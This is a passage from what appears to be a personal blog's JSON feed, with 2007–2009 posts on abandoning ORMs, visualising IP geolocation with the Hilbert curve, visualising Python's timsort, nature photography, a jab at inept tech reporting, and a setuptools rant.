Wilson has devoted much of the latter years of his life to\nthe great cause of preserving our biological legacy - if you are interested in\nthis urgent issue (and you should be) I recommend his 2002 book <a rel=\"external\" href=\"https:\/\/www.amazon.com\/Future-Life-Edward-Wilson\/dp\/0679768114\">The Future of\nLife<\/a>.<\/p>\n"},{"title":"A Farewell to ORMs","published":"2009-10-12T00:00:00+00:00","updated":"2009-10-12T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/farewell-to-orms\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/farewell-to-orms\/","content":"<p>I've been using ORMs for years, starting with my own hand-hacked library back\nin the days before there were good ORMs for Python, and more recently settling\ninto a comfortable reliance on <a rel=\"external\" href=\"http:\/\/www.sqlalchemy.org\/\">SQLAlchemy<\/a>. Over\ntime, though, my initially rosy feelings towards ORMs have begun to sour. I\ngradually realised I was spending a disproportionate amount of time trying to\ncoax the ORM into doing my bidding - and when I succeeded, the results were\noften ugly, slow and needlessly opaque.  Analysing the performance of some of\nthe more complicated portions of my data access layer was often painful, and I\nspent cumulative hours poring over generated SQL, trying to figure out what the\nORM was doing and why. Usually, improving performance involved side-stepping the\nORM altogether. Recently, a particularly gnarly performance issue prompted me to\nditch the ORM from a project altogether, with surprisingly pleasant results.<\/p>\n<h2 id=\"impedance-mismatch\">Impedance mismatch<\/h2>\n<p>Ask any programmer why they use an ORM, and the answer is likely to be\n\"impedance mismatch\". This is a lovely phrase from a rhetorical point of view -\nhovering at the edge of meaning, but nicely avoiding asserting anything that can\nactually be quantified. 
The usual hand-wave is that impedance mismatch arises\nfrom the tension between table-oriented relational data, and object oriented\nconceptual thinking. Your Bicycle class - a subclass, naturally, of Vehicle -\nmight have to be reconstructed from data scattered across six different tables,\nand it's a distressing possibility that none of those tables might be called\nBicycle, or indeed Vehicle. What we should aim for, the argument goes, is a\nprogrammer's Shangri-La where we can transparently persist and restore our\nobjects and have the storage taken care of by some magical plumbing. Whether or\nnot the magical plumbing is worthwhile depends largely on how often the\nabstraction breaks down. The ORM approach does so frequently.  Yes, I can use an\nORM and think at the object level in the common case, but whenever I need to do\nanything remotely complicated - optimising a query, say - I'm back in the land\nof tables and foreign keys. In the end, the structure of data is something\nfundamental that can't be simplified or abstracted away. The ORM doesn't resolve\nthe impedance mismatch, it just postpones it.<\/p>\n<h2 id=\"a-lighter-abstraction\">A lighter abstraction<\/h2>\n<p>So, if ORMs are at best a very partial solution to the ill-defined impedance\nmismatch problem, why do so many programmers swear by them? It's not that\nthey're all fools, it's just that ORMs solve ANOTHER practical problem much more\nsuccessfully. Most programmers who use ORMs do so simply to avoid re-writing\nendless nearly identical CRUD operations for every persistable object in their\nproject.  This isn't about any fundamental object-relational impedance mismatch -\nit's simply a problem of query generation. 
So, this brings me to my own\ndifficult-to-quantify contribution to the miasma of fuzzy thinking that already\nsurrounds this issue: <strong>90% of the benefit most people derive from ORMs can be\ngained more simply and more transparently through unashamedly table-oriented\nquery generation<\/strong>. All we need is a nice programmatic way to generate and\nmanipulate SQL statements...  Luckily we have just such a tool in the\n<a rel=\"external\" href=\"http:\/\/www.sqlalchemy.org\/docs\/05\/sqlexpression.html\">SQLAlchemy SQL expression\nlanguage<\/a> - a good, simple\nand nearly complete language for working with SQL expressions from Python.<\/p>\n<p>Pursuing this line of thought, I've ditched the ORM from a few of my projects.\nInstead, I'm using a defter abstraction - a simple, lightweight framework that\nuses SQLAlchemy's SQL expression language to auto-generate most queries. This\nframework is unashamedly table-oriented, and exists to manipulate data at a\nrelational level. It clocks in at less than 150 lines of code. The database\nschema is no longer defined by the ORM - instead, helper objects are built\nthrough schema reflection. The result has been satisfying - my data layers are\nbetter encapsulated, database interaction is more transparent, and the\nconceptual complexity is much reduced. Since nothing happens magically behind\nthe scenes, it's easier to analyse performance, and since there is no session\nlayer (few projects really need one) a whole chunk of complexity has gone away.\nUsing reflection rather than defining the schema in code has made schema\nevolution much less of a chore. I also retain other benefits usually attributed\nto ORMs - the expression language abstracts away flavour differences between\ndatabases, so I can still, for example, run a large fraction of my unit tests\nagainst in-memory SQLite databases and deploy on PostgreSQL. 
I'm now gradually\nmigrating all my projects to this way of working.<\/p>\n"},{"title":"Leopard Seal at Sandfly Bay","published":"2009-09-09T00:00:00+00:00","updated":"2009-09-09T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/photos\/leopardseal\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/photos\/leopardseal\/","content":"<div class=\"media\">\n    <a href=\"leopardseal.jpg\">\n        <img src=\"leopardseal-small.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Leopard Seal at Sandfly Bay\n    <\/div>\n    \n<\/div>\n<p>Took this shot on my morning walk, 15 minutes away from my home. We are usually\nthe only humans on this 1km beach, and we are often out-numbered 10-1 by sea\nlions. The photo is of a <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Leopard_Seal\">leopard\nseal<\/a> - a rarity in these parts.\nThese sleek top-predators bear as much resemblance to the portly and <a rel=\"external\" href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3886175958\/\">rather\nridiculous<\/a> sea lions as a\nlabradoodle does to a wolf. 
This one was a juvenile - only about 2.5 meters long -\nbut still managed to exude a considerable amount of toothy menace.<\/p>\n"},{"title":"Visualising IP Geolocation","published":"2009-09-05T00:00:00+00:00","updated":"2009-09-05T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/hilbert\/explorer\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/hilbert\/explorer\/","content":"<style>\n    .jpexample img {\n        background: url(\/geohilbert\/ALL.png);\n    }\n<\/style>\n<div class=\"media jpexample\">\n    <a href=\"&#x2F;geohilbert&#x2F;JP.png\">\n        <img src=\"&#x2F;geohilbert&#x2F;JP.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        IP Addresses in Japan\n    <\/div>\n    \n<\/div>\n<p>I'm spending a fair bit of my time working on a project that uses an IP\ngeolocation database to map internet addresses to countries as part of a\nsecurity survey. There are a number of these location databases available, but\ncomparing their quality and coverage is not trivial, so selecting one to use is\nhard. I recently decided to spend a few hours looking at the problem, and got\nhopelessly side-tracked into visualising the databases using the Hilbert curve.\nThe result is the <a href=\"\/geohilbert\/index.html\">Hilbert Explorer<\/a>, a\nmapping of the geographical location of IP addresses onto the Hilbert Curve. You\nshould have a play with it before reading the rest of this post.<\/p>\n<h2 id=\"the-hilbert-curve-a-very-brief-introduction\">The Hilbert Curve - a (very) brief introduction<\/h2>\n<p>The <a href=\"http:\/\/en.wikipedia.org\/wiki\/Hilbert_curve\">Hilbert Curve<\/a> is a\nspace-filling <a href=\"http:\/\/mathworld.wolfram.com\/Curve.html\">curve<\/a> that\nis usually produced iteratively, with the N-th step in the iteration referred to\nas the \"order N\" curve.  
Here are orders 1 to 5:<\/p>\n<table class=\"spacertable\">\n    <tr>\n        <td><img src=\"h1.png\"\/><br>N=1<\/td>\n        <td><img src=\"h2.png\"\/><br>N=2<\/td>\n        <td><img src=\"h3.png\"\/><br>N=3<\/td>\n        <td><img src=\"h4.png\"\/><br>N=4<\/td>\n        <td><img src=\"h5.png\"\/><br>N=5<\/td>\n    <\/tr>\n<\/table>\n<p>To translate from one order to the next, we simply replace U-shapes like the\nN=1 diagram with Y-shapes like the N=2 diagram. So, in the N=1 diagram\nthere is a single U to be replaced, while in the N=2 diagram there are 4 U-shapes\n(two at the top, oriented left and right, and two at the bottom oriented down).\nEach subsequent order has 4 times the number of U shapes the previous one had,\nso for N=3 we have 16 replacements to do, and so on and so forth.<\/p>\n<p>Mathematicians are interested in the behaviour of the limit curve as N\napproaches infinity - luckily the properties of the curve that are interesting\nto computer scientists manifest well short of that. For the purposes of this\npost, we can view the order-N curve simply as a way to lay out a sequence of\n2**2N items on a plane, with the rather interesting property that items that\nare near each other in the sequence are also near each other on the plane:<\/p>\n<div class=\"media\">\n    <a href=\"coordinates.png\">\n        <img src=\"coordinates.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>The recursive construction above is a nice way to explain the curve, but doesn't\nlead to an efficient way to actually draw it. For this I turned to Henry S.\nWarren's wonderful <a rel=\"external\" href=\"http:\/\/www.amazon.com\/exec\/obidos\/ASIN\/0201914654\/qid%3D1033395248\/sr%3D11-1\/ref%3Dsr_11_1\/104-7035682-9311161\">Hacker's\nDelight<\/a>, one of those books that I return to again and again. If you don't\nalready own a copy, just buy it - you won't be disappointed. 
All the images in\nthis post and in the Explorer were drawn with PyCairo using the algorithm for\ncalculating co-ordinates from the distance along the curve given in section 14.4\nof this book.<\/p>\n<h2 id=\"visualising-ip-geolocation\">Visualising IP Geolocation<\/h2>\n<p>Mapping IP addresses to countries is a tricky affair. Control of any given\naddress filters down from IANA to the regional registries, from regional\nregistries to national and local registries, and from there to a myriad of\nprivate and government organisations. Here, horse-trading and private enterprise\ntake over and IP blocks are sold, traded and routed arbitrarily, with the\nconsequence that any given IP might actually be located in a geographical area\ntotally unrelated to the controlling organization or even the registry region. A\nnumber of companies now offer geolocation databases at various prices, some of\nthem for free. The databases themselves typically contain more than 100,000\nsubnets, usually spanning something like two billion actual addresses. I had\nabout half a dozen of these databases to compare, and, being a visual creature,\nI wanted to <strong>see<\/strong> what I was dealing with. I've been fascinated with the\nHilbert curve for a long time, but I first came across the idea of using it to\nvisualise the entire IPv4 address space in Randall Munroe's excellent <a\nhref=\"http:\/\/xkcd.com\/195\/\">hand-drawn map of the Internet<\/a>. After this was\npublished in 2006 a slew of more detailed visualisations appeared, including at\nleast <a href=\"http:\/\/www.isi.edu\/ant\/address\/whole_internet\/index.html\">one on\na 1:1 scale<\/a>.<\/p>\n<p>We can map X points of data onto a discrete Hilbert curve of order lb(X)\/2, so\nthe order 16 Hilbert curve would suffice to display all 2**32 IP addresses at\na one-to-one scale. 
To produce a more manageable image size, I used an order 9\nHilbert curve producing a 512x512 pixel image, where each pixel represents a\nbucket of 16384 addresses. I then rendered a series of transparent PNG layers -\none showing all addresses in the database, and a set of overlays showing the\naddresses in each country and some \"landmarks\" like the <a\nhref=\"http:\/\/tools.ietf.org\/html\/rfc1918\">RFC1918<\/a> addresses. The result\nlooks something like the image at the head of this post. To make the\nvisualisation more interactive, I bolted things together with a bit of\nJavascript to let me easily switch between countries, and to show IP addresses\nwhen hovering over the image. You can find the resulting visualisation for one\nof the freely-available geolocation databases - <a\nhref=\"http:\/\/www.wipmania.com\/en\/base\/\">WorldIP<\/a> - here:<\/p>\n<h2 id=\"hilbert-explorer\"><a href=\"\/geohilbert\/index.html\">Hilbert Explorer<\/a><\/h2>\n<p>I'll stop there for now, and leave the actual database comparison and a deeper\nexploration of the related issues for future posts.<\/p>\n"},{"title":"Seashells from Murdering Beach","published":"2009-08-28T00:00:00+00:00","updated":"2009-08-28T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/photos\/murderingshells\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/photos\/murderingshells\/","content":"<style>\n    .shells td {\n        border-bottom: 0;\n    }\n<\/style>\n<table class=\"shells\">\n    <tr>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863253255\/\" title=\"051shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2598\/3863253255_b6a88458a6_t.jpg\" width=\"100\" height=\"100\" alt=\"051shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863255667\/\" title=\"052shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2477\/3863255667_9de928b4d2_t.jpg\" 
width=\"100\" height=\"100\" alt=\"052shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863256917\/\" title=\"056shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2626\/3863256917_9da498eb94_t.jpg\" width=\"100\" height=\"100\" alt=\"056shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3864040990\/\" title=\"057shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2601\/3864040990_b6465402e8_t.jpg\" width=\"100\" height=\"100\" alt=\"057shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3864042394\/\" title=\"059shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2662\/3864042394_fd9a3e2f14_t.jpg\" width=\"100\" height=\"100\" alt=\"059shells\" \/><\/a><\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3864043258\/\" title=\"060shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2557\/3864043258_2187b97b8c_t.jpg\" width=\"100\" height=\"100\" alt=\"060shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863260683\/\" title=\"061shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2553\/3863260683_6cc9662275_t.jpg\" width=\"100\" height=\"100\" alt=\"061shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3864044842\/\" title=\"062shells by cortesi, on Flickr\"><img src=\"http:\/\/farm4.static.flickr.com\/3181\/3864044842_83ed99b591_t.jpg\" width=\"100\" height=\"100\" alt=\"062shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863262185\/\" title=\"064shells by cortesi, on Flickr\"><img src=\"http:\/\/farm4.static.flickr.com\/3454\/3863262185_c93aff80f1_t.jpg\" width=\"100\" height=\"100\" alt=\"064shells\" \/><\/a><\/td>\n        <td><a 
href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863263741\/\" title=\"065shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2596\/3863263741_1de40df77a_t.jpg\" width=\"100\" height=\"100\" alt=\"065shells\" \/><\/a><\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863264743\/\" title=\"066shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2531\/3863264743_e51a081754_t.jpg\" width=\"100\" height=\"100\" alt=\"066shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863265971\/\" title=\"067shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2584\/3863265971_a540e4cd74_t.jpg\" width=\"100\" height=\"100\" alt=\"067shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863267413\/\" title=\"068shells by cortesi, on Flickr\"><img src=\"http:\/\/farm4.static.flickr.com\/3513\/3863267413_efda95bd09_t.jpg\" width=\"100\" height=\"100\" alt=\"068shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863268603\/\" title=\"069shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2461\/3863268603_49c216a076_t.jpg\" width=\"100\" height=\"100\" alt=\"069shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863270349\/\" title=\"070shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2565\/3863270349_2df1a30663_t.jpg\" width=\"100\" height=\"100\" alt=\"070shells\" \/><\/a><\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863271463\/\" title=\"071shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2633\/3863271463_b8bb6c9416_t.jpg\" width=\"100\" height=\"100\" alt=\"071shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3864056086\/\" 
title=\"072shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2449\/3864056086_9bd2441496_t.jpg\" width=\"100\" height=\"100\" alt=\"072shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863273851\/\" title=\"073shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2598\/3863273851_e36366e0aa_t.jpg\" width=\"100\" height=\"100\" alt=\"073shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863275055\/\" title=\"074shells by cortesi, on Flickr\"><img src=\"http:\/\/farm4.static.flickr.com\/3547\/3863275055_0b078205e7_t.jpg\" width=\"100\" height=\"100\" alt=\"074shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863276473\/\" title=\"075shells by cortesi, on Flickr\"><img src=\"http:\/\/farm4.static.flickr.com\/3438\/3863276473_918bc411d0_t.jpg\" width=\"100\" height=\"100\" alt=\"075shells\" \/><\/a><\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3864061252\/\" title=\"076shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2552\/3864061252_48d169eac2_t.jpg\" width=\"100\" height=\"100\" alt=\"076shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3864062554\/\" title=\"077shells by cortesi, on Flickr\"><img src=\"http:\/\/farm4.static.flickr.com\/3226\/3864062554_3b2ac66bcf_t.jpg\" width=\"100\" height=\"100\" alt=\"077shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3864063810\/\" title=\"078shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2459\/3864063810_5cf4bcfb9a_t.jpg\" width=\"100\" height=\"100\" alt=\"078shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3864064924\/\" title=\"079shells by cortesi, on Flickr\"><img 
src=\"http:\/\/farm4.static.flickr.com\/3511\/3864064924_bcb95a8ea2_t.jpg\" width=\"100\" height=\"100\" alt=\"079shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3864065752\/\" title=\"080shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2519\/3864065752_44baaafcef_t.jpg\" width=\"100\" height=\"100\" alt=\"080shells\" \/><\/a><\/td>\n    <\/tr>\n<\/table>\n<p>Spent the morning collecting and taking photos of tiny seashells on Murdering\nBeach - a secluded local spot with a grisly past. The shells are all about the\nsame size - a centimeter or so across - and seem to be from the same species of\nmarine mollusc. The variety of patterns and colours is endless and fascinating -\nmy inexpertly lit photographs don't do them justice.<\/p>\n"},{"title":"Sorting Algorithm Visualisation Tidbits","published":"2009-08-11T00:00:00+00:00","updated":"2009-08-11T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/sortingquickies\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/sortingquickies\/","content":"<ul>\n<li>Jacob Seidelin has created an awesome port of the sorting algorithm\nvisualisations I came up with in 2007 to Javascript, using the canvas element\nto do the drawing. <a\nhref=\"http:\/\/blog.nihilogic.dk\/2009\/04\/canvas-visualizations-of-sorting.html\">Well\nworth checking out<\/a>.<\/li>\n<li>Another blogger (I'd love to be more specific, but the blog seems to be\nanonymous) was spurred by my post to wonder what sorting algorithms <em>sound<\/em>\nlike. The fascinating result is <a\nhref=\"http:\/\/www.pillowsopher.com\/blog\/?cat=4\">over here<\/a>. 
Bubblesort turns\nout to be quite musical - who knew?<\/li>\n<li>Finally, timsort, which I drew <a href=\"https:\/\/corte.si\/posts\/code\/timsort\/\">pictures of in my last\npost<\/a>, has <a\nhref=\"http:\/\/bugs.sun.com\/bugdatabase\/view_bug.do?bug_id=6804124\">replaced\nmergesort in Java.<\/a><\/li>\n<\/ul>\n"},{"title":"Visualising Sorting Algorithms: Python's timsort","published":"2009-08-08T00:00:00+00:00","updated":"2009-08-08T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/timsort\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/timsort\/","content":"<p><strong>Update<\/strong> See <a rel=\"external\" href=\"http:\/\/sortvis.org\">sortvis.org<\/a> for many more visualisations!<\/p>\n<p>A couple of years ago, I blogged about a technique I came up with for\n<a href=\"https:\/\/corte.si\/posts\/code\/visualisingsorting\/\">statically visualising sorting\nalgorithms<\/a> during a somewhat\nScotch-fueled night of idle hacking. A recent day of poking at the Python\ncodebase gave me an excuse to revisit the post and brush off the bit of code\nthat underpins it. I've wanted to take a closer look at timsort - Tim Peters'\nwonderful sorting implementation for Python - for a while now. In the previous\npost I made a big deal about the fact that many attributes of sorting algorithms\nare easier to see in my static visualisations than in traditional animated\nequivalents. So, I thought it would be fun to see if one could get to grips with\na real-world algorithm like timsort by visualising it. 
The fruit of my labour\ncan be found below - if this kind of thing turns your crank, read on.<\/p>\n<p>Before you go on, you might first want to take a look at the <a href=\"https:\/\/corte.si\/posts\/code\/visualisingsorting\/\">original\npost<\/a> for an explanation of how the\ndiagrams are constructed and some related caveats.<\/p>\n<h2 id=\"inspecting-timsort\">Inspecting timsort<\/h2>\n<p>The first step was to get hold of the progressive sorting data I needed for the\nvisualisation. The way timsort is implemented has two properties that helped\nhere - firstly, it's largely in-place, and secondly, when interrupted by an\nexception in the __cmp__ method of one of the elements it is sorting, it\nleaves the array partially sorted. The pleasant result is that I could get all\nthe data I needed in pure Python, without instrumenting the interpreter source.\nA link to the code is at the bottom of this post.<\/p>\n<h2 id=\"a-first-guess-at-the-algorithm\">A first guess at the algorithm<\/h2>\n<p>The first thing I did was to see if I could get a feel for timsort straight\nfrom the visualisation, without looking at the implementation (yes, I'm\ncheating slightly, since I already had an idea of what I would see). Here's\ntimsort sorting a shuffled array of 64 elements:<\/p>\n<div class=\"media\">\n    <a href=\"64r-tim.png\">\n        <img src=\"64r-tim.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        timsort - 64 elements\n    <\/div>\n    \n<\/div>\n<p>It's immediately clear that timsort has divided the data up into two blocks of\n32 elements. The blocks are pre-sorted in turn (the first two \"triangles\" of\nactivity, reading from left to right), before being merged together in the final\nstep (the cross-hatch pattern at the right of the diagram). 
Looking closer, it's\neven possible to tell that the pre-sorting seems to be using insertion sort -\ncompare the distinctive triangular pattern here with the insertion sort\nvisualisation in the <a href=\"https:\/\/corte.si\/posts\/code\/visualisingsorting\/\">previous post<\/a>.\nWe can confirm this by taking the same data, and running it through an insertion\nsort visualisation.  Here's the first block of 32 elements sorted by insertion\nsort:<\/p>\n<div class=\"media\">\n    <a href=\"half.png\">\n        <img src=\"half.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Insertion sort\n    <\/div>\n    \n<\/div>\n<p>As you can see, this sorting sequence is identical to the one in the upper-left\npart of the timsort diagram. A similar bit of hackery would show that the final\nmerge is done with mergesort. Ok, so at this point, we can take a stab at a\nbroad outline of the timsort algorithm: break the data up into blocks, pre-sort\nthose blocks using insertion sort, and then merge the blocks together using\nmergesort.<\/p>\n<p>This is pretty good going for a quick inspection of a single diagram.<\/p>\n<h2 id=\"what-s-actually-happening\">What's actually happening<\/h2>\n<p>Flicking to the <a href=\"http:\/\/bugs.python.org\/file4451\/timsort.txt\">cheat\nsheet<\/a>, we can see that this guess is almost right. The business-end of\ntimsort is a mergesort that operates on runs of pre-sorted elements. A minimum\nrun length <strong>minrun<\/strong> is chosen to make sure the final merges are as balanced as\npossible - for 64 elements, <strong>minrun<\/strong> happens to be 32. Before the merges\nbegin, a single pass is made through the data to detect pre-existing runs of\nsorted elements. Descending runs are handled by simply reversing them in place.\nIf the resultant run length is less than <strong>minrun<\/strong>, it is boosted to <strong>minrun<\/strong>\nusing insertion sort. 
On a shuffled array with no significant pre-existing runs,\nthis process looks exactly like our guess above: pre-sorting blocks of\n<strong>minrun<\/strong> elements using insertion sort, before merging with merge sort.<\/p>\n<p>We can see a bit more detail by giving timsort the type of data it excels at -\na partially sorted array:<\/p>\n<div class=\"media\">\n    <a href=\"combo.png\">\n        <img src=\"combo-annotated.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        timsort - 64 elements\n    <\/div>\n    \n<\/div>\n<p>Now, looking at the marked progression from left to right:<\/p>\n<ul>\n<li><strong>1)<\/strong> timsort finds a descending run, and reverses the run in-place. This is done\ndirectly on the array of pointers, so seems \"instant\" from our vantage point.<\/li>\n<li><strong>2)<\/strong> The run is now boosted to length <strong>minrun<\/strong> using insertion sort.<\/li>\n<li><strong>3)<\/strong> No run is detected at the beginning of the next block, and insertion sort\nis used to sort the entire block. Note that the sorted elements at the bottom\nof this block are not treated specially - timsort doesn't detect runs that\nstart in the middle of blocks being boosted to <strong>minrun<\/strong>.<\/li>\n<li><strong>4)<\/strong> Finally, mergesort is used to merge the runs.<\/li>\n<\/ul>\n<p>Of course, there's a lot that's not covered here: merge order, stability, the\nsecondary memory requirements of the algorithm, and so forth. Maybe I'll get to\nsome of these in a follow-up post. 
That said, I think this is still quite a\nreasonable high-level pictorial guide to timsort.<\/p>\n<p>I relied heavily on <a href=\"http:\/\/bugs.python.org\/file4451\/timsort.txt\">Uncle\nTim's own description of the algorithm<\/a> in writing this post - if you're\ninterested in timsort, this document is definitely mandatory reading.<\/p>\n<h2 id=\"the-code\">The Code<\/h2>\n<p>I've brushed up the code I included in my previous post and put it on <a\nhref=\"http:\/\/github.com\/cortesi\/sortvis\/tree\/master\">github<\/a>. You can check\nit out like so:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">git<\/span><span style=\"color: #032F62;\"> clone git:\/\/github.com\/cortesi\/sortvis.git<\/span><\/span><\/code><\/pre>"},{"title":"Buller's Albatross","published":"2009-07-12T00:00:00+00:00","updated":"2009-07-12T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/photos\/bullers\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/photos\/bullers\/","content":"<p>An encounter with a magnificent bird today - Buller's Albatross. 
It glided in\nto the side of the boat we were in to check if we had any fish, but took off\ndisappointed when it turned out we did not:<\/p>\n<center>\n    <a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3715192684\/\" title=\"Buller's Albatross by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2610\/3715192684_fae89809e5.jpg\" width=\"500\" height=\"189\" alt=\"Buller's Albatross\" \/><\/a>\n<\/center>\n"},{"title":"How to become a cyber bandit","published":"2008-06-03T00:00:00+00:00","updated":"2008-06-03T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/badreporting\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/badreporting\/","content":"<p>I came across a hilariously inept bit of tech reporting today, courtesy of the\nSydney Morning Herald. Apparently the Wikipedia page for Mick Keelty,\nAustralia's Federal Police Commissioner, was vandalised last week. Hardly\nearth-shattering, right? Just revert the changes, and move on. To a\nsensation-hungry hack without the faintest clue what Wikipedia is, however, this\nlooks like a Story. More particularly, it looks like a story entitled \"<a\nhref=\"http:\/\/www.smh.com.au\/news\/technology\/cyber-bandit-sabotages-top-cop\/2008\/05\/31\/1212258621186.html\">Cyber\nbandit sabotages top cop<\/a>\".<\/p>\n<p>The article gives a minutely detailed rundown of the rather juvenile vandalism\n(apparently perpetrated by a not very imaginative 13-year-old), and is\naccompanied by a stock photo showing a depressed-looking Keelty, evidently\nmeditating on the deep unfairness of it all. The Wikipedia vandal is not just a\n\"cyber bandit\" - he is also referred to as a \"hacker\" throughout. 
The icing on\nthe cake, however, is what has to be a mis-quote from <a\nhref=\"http:\/\/en.wikipedia.org\/wiki\/Angela_Beesley\">Angela Beesley<\/a>:<\/p>\n<blockquote>\n<p>Wikimedia Foundation Advisory Board chairwoman Angela Beesley said the person\nwho made the edits infiltrated the site from outside.<\/p>\n<\/blockquote>\n<p>Infiltrated Wikipedia from the outside? You don't say.<\/p>\n"},{"title":"setuptools sucks","published":"2007-06-18T00:00:00+00:00","updated":"2007-06-18T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/setuptoolssucks\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/setuptoolssucks\/","content":"<p>One of the epic conflicts of our time is being waged between two software design\nphilosophies (bear with me here). Those who follow <strong>Design Philosophy A<\/strong> trust\ntheir users. Software is designed to be transparent and easy to inspect. Users\nare provided with simple and direct ways to control behaviour, and their choices\nare respected. Software developers avoid guessing the user's intent, since users\ncan be trusted to do the sensible thing themselves. Those who follow <strong>Design\nPhilosophy B<\/strong> think their users are idiots.  Software is therefore opaque and\ndifficult to inspect, because users wouldn't understand what is going on, and\nshould be prevented from even trying. The developer's guess is always more\ntrustworthy than the user's command. Users are robbed of options, because if we\ngive the user too much control, they'll just fuck things up.<\/p>\n<p>Philosophy A has given you the open source movement, Unix and the Internet.\nPhilosophy B has given you the Microsoft Paperclip, DRM and an endless stream of\nclueless MCSEs. Philosophy A stands for open standards, free information\nexchange, and user control. 
